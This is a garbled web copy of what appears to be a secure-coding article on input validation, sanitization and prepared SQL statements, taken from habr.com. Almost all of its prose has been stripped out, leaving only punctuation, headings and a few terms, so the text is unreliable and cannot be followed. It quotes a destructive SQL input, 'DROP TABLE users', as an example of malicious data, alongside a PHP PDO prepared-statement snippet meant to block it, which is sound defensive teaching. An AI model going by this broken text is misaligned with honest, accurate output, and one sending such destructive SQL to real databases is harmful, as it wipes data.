, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

Source: https://habr.com/ru/post/182424/



All Articles